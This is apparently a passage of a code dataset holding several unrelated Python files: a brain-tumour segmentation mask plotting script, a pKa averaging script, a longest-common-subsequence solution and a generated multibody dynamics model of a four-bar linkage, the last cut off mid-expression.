os.mkdir(mask_processed_path)\n #\n # if dir_index == 0:\n # # modalities += 'seg'\n # # image_path = imread(os.path.join(image_dir + '/original/BraTS19_2013_2_1_'\n # # + modality + '/' + str(slice_number) + '.png'))\n # # mask_path = imread(os.path.join(image_dir + '/original/BraTS19_2013_2_1_seg/'\n # # + str(slice_number) + '.png'))\n # image_path = imread(os.path.join(image_dir + '/original/BraTS19_2013_2_1_' + modality))\n # mask_path = imread(os.path.join(image_dir + '/original/BraTS19_2013_2_1_seg'))\n # out_path = os.path.join(mask_original_path + '/BraTS19_2013_2_1_' + modality)\n # else:\n # # modalities += 'truth'\n # image_path = imread(os.path.join(image_dir + '/processed/' + modality + '/' + str(slice_number) + '.png'))\n # mask_path = imread(os.path.join(image_dir + '/processed/truth/' + str(slice_number) + '.png'))\n # out_path = os.path.join(mask_processed_path, modality)\n #\n # if not os.path.exists(out_path):\n # os.mkdir(out_path)\n\n print(type(mask), '\\n', np.max(mask), mask.dtype)\n # mask_float = 255.0 * (mask_path/255.0) ** 2\n mask_float = mask.astype(np.float64)\n print(type(mask_float), '\\n', np.max(mask_float), mask_float.dtype)\n print('\\nWT: ', 
np.sum(get_whole_tumor_mask(mask_float)),\n '\\nTC: ', np.sum(get_tumor_core_mask(mask_float)),\n '\\nET: ', np.sum(get_enhancing_tumor_mask(mask_float)))\n\n\n # print(slice_number)\n\n # print(type(image), type(mask))\n # print(image)\n # mask = data.chelsea()\n img_float = image.astype(np.float64)\n print(np.max(img_float), np.min(img_float))\n\n # mask_grey = color.rgb2gray(mask)\n mask_grey = 255.0 * mask / np.max(mask)\n print('mask:', np.max(mask_grey), np.min(mask_grey))\n mask_grey = color.rgb2gray(mask_grey)\n mask_grey = mask_float\n print('mask:', np.max(mask_grey), np.min(mask_grey))\n print('image:', np.max(image), np.min(image))\n print('mask_dtype:', mask_grey.dtype, 'image_dtype:', image.dtype)\n print('type:', type(mask_grey), type(image))\n\n ET, EDEMA, NCR_and_NET = 0, 0, 0\n print(NCR_and_NET)\n\n '''\n \n 4 uint8\n \n 4.0 float64\n \n WT: 6432 \n TC: 3723 \n ET: 2877\n 255.0 0.0\n mask: 255.0 0.0\n mask: 4.0 0.0\n image: 255 0\n mask_dtype: float64 image_dtype: uint8\n type: \n '''\n\n rows, cols = mask_grey.shape\n labels = np.zeros([rows, cols])\n for i in range(rows):\n for j in range(cols):\n # if mask_grey[i, j] > 0.66:\n if mask_grey[i, j] == 1: # ET, labels_number:the second biggest, blue\n labels[i, j] = 2\n ET += 1\n elif mask_grey[i, j] == 0.5: # WT-ET-TC = edema, labels_number:biggest, yellow\n labels[i, j] = 3\n EDEMA += 1\n elif mask_grey[i, j] > 0: # TC-ET\n labels[i, j] = 1\n NCR_and_NET += 1\n # label_image = color.label2rgb(labels, bg_label=0)\n # label_image = color.label2rgb(labels, image=image)\n\n TC = NCR_and_NET + ET\n WT = TC + EDEMA\n print('ET: ', ET)\n print('EDEMA: ', EDEMA)\n print('NCR_and_NET: ', NCR_and_NET)\n print('TC: ', TC)\n print('WT: ', WT)\n\n label_image = color.label2rgb(labels, bg_label=0)\n # label_image = color.label2rgb(labels, image=image, bg_label=0)\n\n # figsize = mask_grey.shape[0]/ , mask_grey.shape[1]\n plt.figure(figsize=(15, 15))\n # plt.figure(figsize=(15, 15), facecolor='black')\n print(label_image.dtype)\n # plt.imshow(label_image, cmap='gray')\n plt.imshow(label_image)\n plt.axis('off')\n plt.tight_layout(pad=0)\n # plt.savefig(os.path.join(out_path + '/test_plot.png'))\n plt.savefig('test_plot.png')\n plt.show()\n\n # io.show()\n\n\nif __name__ == '__main__':\n draw_mask_skimage()\n","sub_path":"mask_2d.py","file_name":"mask_2d.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"111963421","text":"import numpy as np\nimport pandas as pd\nimport os\n\nreps = [ 1 , 2 , 3 , 4 , 5 ]\n#reps = [ 1 ]\n\n\npwd = os.getcwd()\n\npkas = {}\n\nfor rep in reps:\n\tallfiles = os.listdir(pwd+'/'+str(rep))\n\tpath = pwd + '/' + str(rep) + '/'\n\t\n\t\n\tfor filename in allfiles:\n\t\tif( filename.split('.')[-1] == 'xvg' ):\n\t\t\tfullpath = path + filename\n\t\t\t\n\t\t\tfilename = filename.replace('-','_').replace('.','_')\n\t\t\tfilename = filename.split('_')\n\t\t\t\n\t\t\tres_name = str(filename[1])\n\t\t\tres_numb = str(filename[2])\n\t\t\tchain = str(filename[3])\n\t\t\t\n\t\t\tresidue = res_name + '-' + res_numb + '_' + chain\n\t\t\t\n\t\t\tif( residue not in pkas ):\n\t\t\t\tpkas[residue] = []\n\t\t\t\n\t\t\txvg = pd.read_csv( fullpath , sep='\\t' , header=None)\n\t\t\txvg.columns = ['time','pka']\n\t\t\t\n\t\t\tavg = xvg['pka'].mean()\n\t\t\tstd = xvg['pka'].std(ddof=1)\n\t\t\t\n\t\t\tpkas[residue].append( avg )\n\t\t\t\n\nresidue_list = [x for x in pkas.keys()]\nresidue_list.sort()\n\n\nwith open('pka_avg.dat','w') as 
output_file:\n\tfor residue in residue_list:\n\t\tvec = np.array( pkas[residue] )\n\t\t\n\t\tavg = vec.mean()\n\t\terr = vec.std() / np.sqrt( len(vec) )\n\t\t\n\t\toutput_file.write('%s\\t%.6f\\t%.6f\\n' % (residue , avg, err))\n\t\n","sub_path":"pka_avg.py","file_name":"pka_avg.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"66824354","text":"class Solution(object):\n    def longestCommonSubsequence(self, text1, text2):\n        \"\"\"\n        :type text1: str\n        :type text2: str\n        :rtype: int\n        \"\"\"\n        # guard against None or empty inputs (original compared len(text1) to None, which is always False)\n        if text1==None or len(text1)==0 or text2==None or len(text2)==0:\n            return 0\n        dp=[[0]*(len(text2)+1) for i in range(len(text1)+1)]\n        for i in range(len(text1)):\n            for j in range(len(text2)):\n                if text1[i]==text2[j]:\n                    dp[i+1][j+1]=dp[i][j]+1\n                else:\n                    dp[i+1][j+1]=max(dp[i+1][j],dp[i][j+1])\n        return dp[-1][-1]","sub_path":"1143.最长公共子序列/1143-最长公共子序列.py","file_name":"1143-最长公共子序列.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"405447769","text":"\nimport numpy as np\nfrom numpy import cos, sin\nfrom numpy.linalg import multi_dot\nfrom scipy.misc import derivative\n\ntry:\n    from smbd.numenv.python.numerics.matrix_funcs import A, B, G, E, triad, skew_matrix as skew\nexcept ModuleNotFoundError:\n    print('Failed importing compiled matrices!')\n    print('Falling back to python defined matrix functions')\n    from smbd.numenv.python.numerics.misc import A, B, G, E, triad, skew_matrix as skew\n\n\n\nclass topology(object):\n\n    def __init__(self,prefix=''):\n        self.t = 0.0\n        self.prefix = (prefix if prefix=='' else prefix+'.')\n        self.config = None\n\n        self.indicies_map = {'ground': 0, 'rbs_crank': 1, 'rbs_conct': 2, 'rbs_rockr': 3}\n\n        self.n = 28\n        self.nc = 29\n        self.nrows = 16\n        self.ncols = 2*4\n        self.rows = np.arange(self.nrows)\n\n        reactions_indicies = ['F_ground_jcs_a', 'T_ground_jcs_a', 'F_ground_mcs_act', 'T_ground_mcs_act', 'F_rbs_crank_mcs_abs', 'T_rbs_crank_mcs_abs', 'F_rbs_crank_jcs_b', 'T_rbs_crank_jcs_b', 'F_rbs_conct_jcs_c', 'T_rbs_conct_jcs_c', 'F_rbs_rockr_jcs_d', 'T_rbs_rockr_jcs_d']\n        self.reactions_indicies = ['%s%s'%(self.prefix,i) for i in reactions_indicies]\n\n    \n\n    def initialize(self):\n        self.t = 0\n        self.assemble(self.indicies_map, {}, 0)\n        self.set_initial_states()\n        self.eval_constants()\n\n    def assemble(self, indicies_map, interface_map, rows_offset):\n        self.rows_offset = rows_offset\n        self._set_mapping(indicies_map, interface_map)\n        self.rows += self.rows_offset\n        self.jac_rows = np.array([0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8, 8, 8, 9, 9, 9, 9, 10, 10, 10, 10, 11, 11, 12, 12, 13, 14, 15])\n        self.jac_rows += self.rows_offset\n        self.jac_cols = [self.ground*2, self.ground*2+1, self.rbs_crank*2, self.rbs_crank*2+1, self.ground*2, self.ground*2+1, self.rbs_crank*2, self.rbs_crank*2+1, self.ground*2, self.ground*2+1, self.rbs_crank*2, self.rbs_crank*2+1, self.ground*2, self.ground*2+1, self.rbs_crank*2, self.rbs_crank*2+1, self.ground*2, self.ground*2+1, self.rbs_crank*2, self.rbs_crank*2+1, self.rbs_crank*2, self.rbs_crank*2+1, self.rbs_conct*2, self.rbs_conct*2+1, self.rbs_conct*2, self.rbs_conct*2+1, self.rbs_rockr*2, self.rbs_rockr*2+1, self.rbs_conct*2, self.rbs_conct*2+1, self.rbs_rockr*2, self.rbs_rockr*2+1, self.ground*2, self.ground*2+1, self.rbs_rockr*2, self.rbs_rockr*2+1, self.ground*2, self.ground*2+1, 
self.rbs_rockr*2, self.rbs_rockr*2+1, self.ground*2, self.ground*2+1, self.rbs_rockr*2, self.rbs_rockr*2+1, self.ground*2, self.ground*2+1, self.ground*2, self.ground*2+1, self.rbs_crank*2+1, self.rbs_conct*2+1, self.rbs_rockr*2+1]\n\n def set_initial_states(self):\n self.set_gen_coordinates(self.config.q)\n self.set_gen_velocities(self.config.qd)\n self.q0 = self.config.q\n\n def _set_mapping(self,indicies_map, interface_map):\n p = self.prefix\n self.ground = indicies_map[p+'ground']\n self.rbs_crank = indicies_map[p+'rbs_crank']\n self.rbs_conct = indicies_map[p+'rbs_conct']\n self.rbs_rockr = indicies_map[p+'rbs_rockr']\n \n\n \n def eval_constants(self):\n config = self.config\n\n self.Pg_ground = np.array([[1], [0], [0], [0]], dtype=np.float64)\n self.m_ground = 1.0\n self.Jbar_ground = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]], dtype=np.float64)\n self.F_rbs_crank_gravity = np.array([[0], [0], [-9810.0*config.m_rbs_crank]], dtype=np.float64)\n self.F_rbs_conct_gravity = np.array([[0], [0], [-9810.0*config.m_rbs_conct]], dtype=np.float64)\n self.F_rbs_rockr_gravity = np.array([[0], [0], [-9810.0*config.m_rbs_rockr]], dtype=np.float64)\n\n self.Mbar_ground_jcs_a = multi_dot([A(config.P_ground).T,triad(config.ax1_jcs_a)])\n self.Mbar_rbs_crank_jcs_a = multi_dot([A(config.P_rbs_crank).T,triad(config.ax1_jcs_a)])\n self.ubar_ground_jcs_a = (multi_dot([A(config.P_ground).T,config.pt1_jcs_a]) + -1*multi_dot([A(config.P_ground).T,config.R_ground]))\n self.ubar_rbs_crank_jcs_a = (multi_dot([A(config.P_rbs_crank).T,config.pt1_jcs_a]) + -1*multi_dot([A(config.P_rbs_crank).T,config.R_rbs_crank]))\n self.Mbar_ground_mcs_act = self.Mbar_ground_jcs_a\n self.Mbar_rbs_crank_mcs_act = self.Mbar_rbs_crank_jcs_a\n self.ubar_rbs_crank_mcs_abs = (multi_dot([A(config.P_rbs_crank).T,config.pt1_mcs_abs]) + -1*multi_dot([A(config.P_rbs_crank).T,config.R_rbs_crank]))\n self.ubar_ground_mcs_abs = (multi_dot([A(config.P_ground).T,config.pt1_mcs_abs]) + -1*multi_dot([A(config.P_ground).T,config.R_ground]))\n self.Mbar_rbs_crank_jcs_b = multi_dot([A(config.P_rbs_crank).T,triad(config.ax1_jcs_b)])\n self.Mbar_rbs_conct_jcs_b = multi_dot([A(config.P_rbs_conct).T,triad(config.ax1_jcs_b)])\n self.ubar_rbs_crank_jcs_b = (multi_dot([A(config.P_rbs_crank).T,config.pt1_jcs_b]) + -1*multi_dot([A(config.P_rbs_crank).T,config.R_rbs_crank]))\n self.ubar_rbs_conct_jcs_b = (multi_dot([A(config.P_rbs_conct).T,config.pt1_jcs_b]) + -1*multi_dot([A(config.P_rbs_conct).T,config.R_rbs_conct]))\n self.Mbar_rbs_conct_jcs_c = multi_dot([A(config.P_rbs_conct).T,triad(config.ax1_jcs_c)])\n self.Mbar_rbs_rockr_jcs_c = multi_dot([A(config.P_rbs_rockr).T,triad(config.ax2_jcs_c,triad(config.ax1_jcs_c)[0:3,1:2])])\n self.ubar_rbs_conct_jcs_c = (multi_dot([A(config.P_rbs_conct).T,config.pt1_jcs_c]) + -1*multi_dot([A(config.P_rbs_conct).T,config.R_rbs_conct]))\n self.ubar_rbs_rockr_jcs_c = (multi_dot([A(config.P_rbs_rockr).T,config.pt1_jcs_c]) + -1*multi_dot([A(config.P_rbs_rockr).T,config.R_rbs_rockr]))\n self.Mbar_rbs_rockr_jcs_d = multi_dot([A(config.P_rbs_rockr).T,triad(config.ax1_jcs_d)])\n self.Mbar_ground_jcs_d = multi_dot([A(config.P_ground).T,triad(config.ax1_jcs_d)])\n self.ubar_rbs_rockr_jcs_d = (multi_dot([A(config.P_rbs_rockr).T,config.pt1_jcs_d]) + -1*multi_dot([A(config.P_rbs_rockr).T,config.R_rbs_rockr]))\n self.ubar_ground_jcs_d = (multi_dot([A(config.P_ground).T,config.pt1_jcs_d]) + -1*multi_dot([A(config.P_ground).T,config.R_ground]))\n\n \n def set_gen_coordinates(self,q):\n self.R_ground = q[0:3,0:1]\n self.P_ground = 
q[3:7,0:1]\n self.R_rbs_crank = q[7:10,0:1]\n self.P_rbs_crank = q[10:14,0:1]\n self.R_rbs_conct = q[14:17,0:1]\n self.P_rbs_conct = q[17:21,0:1]\n self.R_rbs_rockr = q[21:24,0:1]\n self.P_rbs_rockr = q[24:28,0:1]\n\n \n def set_gen_velocities(self,qd):\n self.Rd_ground = qd[0:3,0:1]\n self.Pd_ground = qd[3:7,0:1]\n self.Rd_rbs_crank = qd[7:10,0:1]\n self.Pd_rbs_crank = qd[10:14,0:1]\n self.Rd_rbs_conct = qd[14:17,0:1]\n self.Pd_rbs_conct = qd[17:21,0:1]\n self.Rd_rbs_rockr = qd[21:24,0:1]\n self.Pd_rbs_rockr = qd[24:28,0:1]\n\n \n def set_gen_accelerations(self,qdd):\n self.Rdd_ground = qdd[0:3,0:1]\n self.Pdd_ground = qdd[3:7,0:1]\n self.Rdd_rbs_crank = qdd[7:10,0:1]\n self.Pdd_rbs_crank = qdd[10:14,0:1]\n self.Rdd_rbs_conct = qdd[14:17,0:1]\n self.Pdd_rbs_conct = qdd[17:21,0:1]\n self.Rdd_rbs_rockr = qdd[21:24,0:1]\n self.Pdd_rbs_rockr = qdd[24:28,0:1]\n\n \n def set_lagrange_multipliers(self,Lambda):\n self.L_jcs_a = Lambda[0:5,0:1]\n self.L_mcs_act = Lambda[5:6,0:1]\n self.L_mcs_abs = Lambda[6:7,0:1]\n self.L_jcs_b = Lambda[7:10,0:1]\n self.L_jcs_c = Lambda[10:14,0:1]\n self.L_jcs_d = Lambda[14:19,0:1]\n\n \n def eval_pos_eq(self):\n config = self.config\n t = self.t\n\n x0 = self.R_ground\n x1 = self.R_rbs_crank\n x2 = self.P_ground\n x3 = A(x2)\n x4 = self.P_rbs_crank\n x5 = A(x4)\n x6 = x3.T\n x7 = self.Mbar_rbs_crank_jcs_a[:,2:3]\n x8 = self.Mbar_rbs_crank_mcs_act[:,0:1]\n x9 = np.eye(1, dtype=np.float64)\n x10 = self.R_rbs_conct\n x11 = self.P_rbs_conct\n x12 = A(x11)\n x13 = self.R_rbs_rockr\n x14 = self.P_rbs_rockr\n x15 = A(x14)\n x16 = x15.T\n x17 = self.Mbar_ground_jcs_d[:,2:3]\n x18 = -1*x9\n\n self.pos_eq_blocks = [(x0 + -1*x1 + multi_dot([x3,self.ubar_ground_jcs_a]) + -1*multi_dot([x5,self.ubar_rbs_crank_jcs_a])),\n multi_dot([self.Mbar_ground_jcs_a[:,0:1].T,x6,x5,x7]),\n multi_dot([self.Mbar_ground_jcs_a[:,1:2].T,x6,x5,x7]),\n (cos(config.UF_mcs_act(t))*multi_dot([self.Mbar_ground_mcs_act[:,1:2].T,x6,x5,x8]) + -1*sin(config.UF_mcs_act(t))*multi_dot([self.Mbar_ground_mcs_act[:,0:1].T,x6,x5,x8])),\n (-1*config.UF_mcs_abs(t)*x9 + (x1 + -1*config.pt1_mcs_abs + multi_dot([x5,self.ubar_rbs_crank_mcs_abs]))[0:1,0:1]),\n (x1 + -1*x10 + multi_dot([x5,self.ubar_rbs_crank_jcs_b]) + -1*multi_dot([x12,self.ubar_rbs_conct_jcs_b])),\n (x10 + -1*x13 + multi_dot([x12,self.ubar_rbs_conct_jcs_c]) + -1*multi_dot([x15,self.ubar_rbs_rockr_jcs_c])),\n multi_dot([self.Mbar_rbs_conct_jcs_c[:,0:1].T,x12.T,x15,self.Mbar_rbs_rockr_jcs_c[:,0:1]]),\n (x13 + -1*x0 + multi_dot([x15,self.ubar_rbs_rockr_jcs_d]) + -1*multi_dot([x3,self.ubar_ground_jcs_d])),\n multi_dot([self.Mbar_rbs_rockr_jcs_d[:,0:1].T,x16,x3,x17]),\n multi_dot([self.Mbar_rbs_rockr_jcs_d[:,1:2].T,x16,x3,x17]),\n x0,\n (x2 + -1*self.Pg_ground),\n (x18 + multi_dot([x4.T,x4])),\n (x18 + multi_dot([x11.T,x11])),\n (x18 + multi_dot([x14.T,x14]))]\n\n \n def eval_vel_eq(self):\n config = self.config\n t = self.t\n\n v0 = np.zeros((3,1),dtype=np.float64)\n v1 = np.zeros((1,1),dtype=np.float64)\n v2 = np.eye(1, dtype=np.float64)\n\n self.vel_eq_blocks = [v0,\n v1,\n v1,\n -1*derivative(config.UF_mcs_act, t, 0.1, 1)*v2,\n -1*derivative(config.UF_mcs_abs, t, 0.1, 1)*v2,\n v0,\n v0,\n v1,\n v0,\n v1,\n v1,\n v0,\n np.zeros((4,1),dtype=np.float64),\n v1,\n v1,\n v1]\n\n \n def eval_acc_eq(self):\n config = self.config\n t = self.t\n\n a0 = self.Pd_ground\n a1 = self.Pd_rbs_crank\n a2 = self.Mbar_ground_jcs_a[:,0:1]\n a3 = self.P_ground\n a4 = A(a3).T\n a5 = self.Mbar_rbs_crank_jcs_a[:,2:3]\n a6 = B(a1,a5)\n a7 = a5.T\n a8 = self.P_rbs_crank\n a9 = 
A(a8).T\n a10 = a0.T\n a11 = B(a8,a5)\n a12 = self.Mbar_ground_jcs_a[:,1:2]\n a13 = np.eye(1, dtype=np.float64)\n a14 = self.Mbar_rbs_crank_mcs_act[:,0:1]\n a15 = self.Mbar_ground_mcs_act[:,1:2]\n a16 = self.Mbar_ground_mcs_act[:,0:1]\n a17 = self.Pd_rbs_conct\n a18 = self.Pd_rbs_rockr\n a19 = self.Mbar_rbs_rockr_jcs_c[:,0:1]\n a20 = self.P_rbs_rockr\n a21 = A(a20).T\n a22 = self.Mbar_rbs_conct_jcs_c[:,0:1]\n a23 = self.P_rbs_conct\n a24 = a17.T\n a25 = self.Mbar_rbs_rockr_jcs_d[:,0:1]\n a26 = self.Mbar_ground_jcs_d[:,2:3]\n a27 = B(a0,a26)\n a28 = a26.T\n a29 = a18.T\n a30 = B(a3,a26)\n a31 = self.Mbar_rbs_rockr_jcs_d[:,1:2]\n\n self.acc_eq_blocks = [(multi_dot([B(a0,self.ubar_ground_jcs_a),a0]) + -1*multi_dot([B(a1,self.ubar_rbs_crank_jcs_a),a1])),\n (multi_dot([a2.T,a4,a6,a1]) + multi_dot([a7,a9,B(a0,a2),a0]) + 2*multi_dot([a10,B(a3,a2).T,a11,a1])),\n (multi_dot([a12.T,a4,a6,a1]) + multi_dot([a7,a9,B(a0,a12),a0]) + 2*multi_dot([a10,B(a3,a12).T,a11,a1])),\n (-1*derivative(config.UF_mcs_act, t, 0.1, 2)*a13 + multi_dot([a14.T,a9,(cos(config.UF_mcs_act(t))*B(a0,a15) + -1*sin(config.UF_mcs_act(t))*B(a0,a16)),a0]) + multi_dot([(cos(config.UF_mcs_act(t))*multi_dot([a15.T,a4]) + -1*sin(config.UF_mcs_act(t))*multi_dot([a16.T,a4])),B(a1,a14),a1]) + 2*multi_dot([(cos(config.UF_mcs_act(t))*multi_dot([a10,B(a3,a15).T]) + -1*sin(config.UF_mcs_act(t))*multi_dot([a10,B(a3,a16).T])),B(a8,a14),a1])),\n (-1*derivative(config.UF_mcs_abs, t, 0.1, 2)*a13 + multi_dot([B(a1,self.ubar_rbs_crank_mcs_abs),a1])[0:1,0:1]),\n (multi_dot([B(a1,self.ubar_rbs_crank_jcs_b),a1]) + -1*multi_dot([B(a17,self.ubar_rbs_conct_jcs_b),a17])),\n (multi_dot([B(a17,self.ubar_rbs_conct_jcs_c),a17]) + -1*multi_dot([B(a18,self.ubar_rbs_rockr_jcs_c),a18])),\n (multi_dot([a19.T,a21,B(a17,a22),a17]) + multi_dot([a22.T,A(a23).T,B(a18,a19),a18]) + 2*multi_dot([a24,B(a23,a22).T,B(a20,a19),a18])),\n (multi_dot([B(a18,self.ubar_rbs_rockr_jcs_d),a18]) + -1*multi_dot([B(a0,self.ubar_ground_jcs_d),a0])),\n (multi_dot([a25.T,a21,a27,a0]) + multi_dot([a28,a4,B(a18,a25),a18]) + 2*multi_dot([a29,B(a20,a25).T,a30,a0])),\n (multi_dot([a31.T,a21,a27,a0]) + multi_dot([a28,a4,B(a18,a31),a18]) + 2*multi_dot([a29,B(a20,a31).T,a30,a0])),\n np.zeros((3,1),dtype=np.float64),\n np.zeros((4,1),dtype=np.float64),\n 2*multi_dot([a1.T,a1]),\n 2*multi_dot([a24,a17]),\n 2*multi_dot([a29,a18])]\n\n \n def eval_jac_eq(self):\n config = self.config\n t = self.t\n\n j0 = np.eye(3, dtype=np.float64)\n j1 = self.P_ground\n j2 = np.zeros((1,3),dtype=np.float64)\n j3 = self.Mbar_rbs_crank_jcs_a[:,2:3]\n j4 = j3.T\n j5 = self.P_rbs_crank\n j6 = A(j5).T\n j7 = self.Mbar_ground_jcs_a[:,0:1]\n j8 = self.Mbar_ground_jcs_a[:,1:2]\n j9 = -1*j0\n j10 = A(j1).T\n j11 = B(j5,j3)\n j12 = self.Mbar_rbs_crank_mcs_act[:,0:1]\n j13 = self.Mbar_ground_mcs_act[:,1:2]\n j14 = self.Mbar_ground_mcs_act[:,0:1]\n j15 = self.P_rbs_conct\n j16 = self.Mbar_rbs_rockr_jcs_c[:,0:1]\n j17 = self.P_rbs_rockr\n j18 = A(j17).T\n j19 = self.Mbar_rbs_conct_jcs_c[:,0:1]\n j20 = self.Mbar_ground_jcs_d[:,2:3]\n j21 = j20.T\n j22 = self.Mbar_rbs_rockr_jcs_d[:,0:1]\n j23 = self.Mbar_rbs_rockr_jcs_d[:,1:2]\n j24 = B(j1,j20)\n\n self.jac_eq_blocks = [j0,\n B(j1,self.ubar_ground_jcs_a),\n j9,\n -1*B(j5,self.ubar_rbs_crank_jcs_a),\n j2,\n multi_dot([j4,j6,B(j1,j7)]),\n j2,\n multi_dot([j7.T,j10,j11]),\n j2,\n multi_dot([j4,j6,B(j1,j8)]),\n j2,\n multi_dot([j8.T,j10,j11]),\n j2,\n multi_dot([j12.T,j6,(cos(config.UF_mcs_act(t))*B(j1,j13) + -1*sin(config.UF_mcs_act(t))*B(j1,j14))]),\n j2,\n 
multi_dot([(cos(config.UF_mcs_act(t))*multi_dot([j13.T,j10]) + -1*sin(config.UF_mcs_act(t))*multi_dot([j14.T,j10])),B(j5,j12)]),\n j2,\n np.zeros((1,4),dtype=np.float64),\n j0[0:1,0:3],\n B(j5,self.ubar_rbs_crank_mcs_abs)[0:1,0:4],\n j0,\n B(j5,self.ubar_rbs_crank_jcs_b),\n j9,\n -1*B(j15,self.ubar_rbs_conct_jcs_b),\n j0,\n B(j15,self.ubar_rbs_conct_jcs_c),\n j9,\n -1*B(j17,self.ubar_rbs_rockr_jcs_c),\n j2,\n multi_dot([j16.T,j18,B(j15,j19)]),\n j2,\n multi_dot([j19.T,A(j15).T,B(j17,j16)]),\n j9,\n -1*B(j1,self.ubar_ground_jcs_d),\n j0,\n B(j17,self.ubar_rbs_rockr_jcs_d),\n j2,\n multi_dot([j22.T,j18,j24]),\n j2,\n multi_dot([j21,j10,B(j17,j22)]),\n j2,\n multi_dot([j23.T,j18,j24]),\n j2,\n multi_dot([j21,j10,B(j17,j23)]),\n j0,\n np.zeros((3,4),dtype=np.float64),\n np.zeros((4,3),dtype=np.float64),\n np.eye(4, dtype=np.float64),\n 2*j5.T,\n 2*j15.T,\n 2*j17.T]\n\n \n def eval_mass_eq(self):\n config = self.config\n t = self.t\n\n m0 = np.eye(3, dtype=np.float64)\n m1 = G(self.P_ground)\n m2 = G(self.P_rbs_crank)\n m3 = G(self.P_rbs_conct)\n m4 = G(self.P_rbs_rockr)\n\n self.mass_eq_blocks = [self.m_ground*m0,\n 4*multi_dot([m1.T,self.Jbar_ground,m1]),\n config.m_rbs_crank*m0,\n 4*multi_dot([m2.T,config.Jbar_rbs_crank,m2]),\n config.m_rbs_conct*m0,\n 4*multi_dot([m3.T,config.Jbar_rbs_conct,m3]),\n config.m_rbs_rockr*m0,\n 4*multi_dot([m4.T,config.Jbar_rbs_rockr,m4])]\n\n \n def eval_frc_eq(self):\n config = self.config\n t = self.t\n\n f0 = G(self.Pd_rbs_crank)\n f1 = G(self.Pd_rbs_conct)\n f2 = G(self.Pd_rbs_rockr)\n\n self.frc_eq_blocks = [np.zeros((3,1),dtype=np.float64),\n np.zeros((4,1),dtype=np.float64),\n self.F_rbs_crank_gravity,\n 8*multi_dot([f0.T,config.Jbar_rbs_crank,f0,self.P_rbs_crank]),\n self.F_rbs_conct_gravity,\n 8*multi_dot([f1.T,config.Jbar_rbs_conct,f1,self.P_rbs_conct]),\n self.F_rbs_rockr_gravity,\n 8*multi_dot([f2.T,config.Jbar_rbs_rockr,f2,self.P_rbs_rockr])]\n\n \n def eval_reactions_eq(self):\n config = self.config\n t = self.t\n\n Q_ground_jcs_a = -1*multi_dot([np.bmat([[np.eye(3, dtype=np.float64),np.zeros((1,3),dtype=np.float64).T,np.zeros((1,3),dtype=np.float64).T],[B(self.P_ground,self.ubar_ground_jcs_a).T,multi_dot([B(self.P_ground,self.Mbar_ground_jcs_a[:,0:1]).T,A(self.P_rbs_crank),self.Mbar_rbs_crank_jcs_a[:,2:3]]),multi_dot([B(self.P_ground,self.Mbar_ground_jcs_a[:,1:2]).T,A(self.P_rbs_crank),self.Mbar_rbs_crank_jcs_a[:,2:3]])]]),self.L_jcs_a])\n self.F_ground_jcs_a = Q_ground_jcs_a[0:3,0:1]\n Te_ground_jcs_a = Q_ground_jcs_a[3:7,0:1]\n self.T_ground_jcs_a = (-1*multi_dot([skew(multi_dot([A(self.P_ground),self.ubar_ground_jcs_a])),self.F_ground_jcs_a]) + 0.5*multi_dot([E(self.P_ground),Te_ground_jcs_a]))\n Q_ground_mcs_act = -1*multi_dot([np.bmat([[np.zeros((1,3),dtype=np.float64).T],[multi_dot([(-1*sin(config.UF_mcs_act(t))*B(self.P_ground,self.Mbar_ground_mcs_act[:,0:1]).T + cos(config.UF_mcs_act(t))*B(self.P_ground,self.Mbar_ground_mcs_act[:,1:2]).T),A(self.P_rbs_crank),self.Mbar_rbs_crank_mcs_act[:,0:1]])]]),self.L_mcs_act])\n self.F_ground_mcs_act = Q_ground_mcs_act[0:3,0:1]\n Te_ground_mcs_act = Q_ground_mcs_act[3:7,0:1]\n self.T_ground_mcs_act = 0.5*multi_dot([E(self.P_ground),Te_ground_mcs_act])\n Q_rbs_crank_mcs_abs = -1*multi_dot([np.bmat([[np.eye(3, dtype=np.float64)[0:1,0:3].T],[B(self.P_rbs_crank,self.ubar_rbs_crank_mcs_abs)[0:1,0:4].T]]),self.L_mcs_abs])\n self.F_rbs_crank_mcs_abs = Q_rbs_crank_mcs_abs[0:3,0:1]\n Te_rbs_crank_mcs_abs = Q_rbs_crank_mcs_abs[3:7,0:1]\n self.T_rbs_crank_mcs_abs = 
(-1*multi_dot([skew(multi_dot([A(self.P_rbs_crank),self.ubar_rbs_crank_mcs_abs])),self.F_rbs_crank_mcs_abs]) + 0.5*multi_dot([E(self.P_rbs_crank),Te_rbs_crank_mcs_abs]))\n Q_rbs_crank_jcs_b = -1*multi_dot([np.bmat([[np.eye(3, dtype=np.float64)],[B(self.P_rbs_crank,self.ubar_rbs_crank_jcs_b).T]]),self.L_jcs_b])\n self.F_rbs_crank_jcs_b = Q_rbs_crank_jcs_b[0:3,0:1]\n Te_rbs_crank_jcs_b = Q_rbs_crank_jcs_b[3:7,0:1]\n self.T_rbs_crank_jcs_b = (-1*multi_dot([skew(multi_dot([A(self.P_rbs_crank),self.ubar_rbs_crank_jcs_b])),self.F_rbs_crank_jcs_b]) + 0.5*multi_dot([E(self.P_rbs_crank),Te_rbs_crank_jcs_b]))\n Q_rbs_conct_jcs_c = -1*multi_dot([np.bmat([[np.eye(3, dtype=np.float64),np.zeros((1,3),dtype=np.float64).T],[B(self.P_rbs_conct,self.ubar_rbs_conct_jcs_c).T,multi_dot([B(self.P_rbs_conct,self.Mbar_rbs_conct_jcs_c[:,0:1]).T,A(self.P_rbs_rockr),self.Mbar_rbs_rockr_jcs_c[:,0:1]])]]),self.L_jcs_c])\n self.F_rbs_conct_jcs_c = Q_rbs_conct_jcs_c[0:3,0:1]\n Te_rbs_conct_jcs_c = Q_rbs_conct_jcs_c[3:7,0:1]\n self.T_rbs_conct_jcs_c = (-1*multi_dot([skew(multi_dot([A(self.P_rbs_conct),self.ubar_rbs_conct_jcs_c])),self.F_rbs_conct_jcs_c]) + 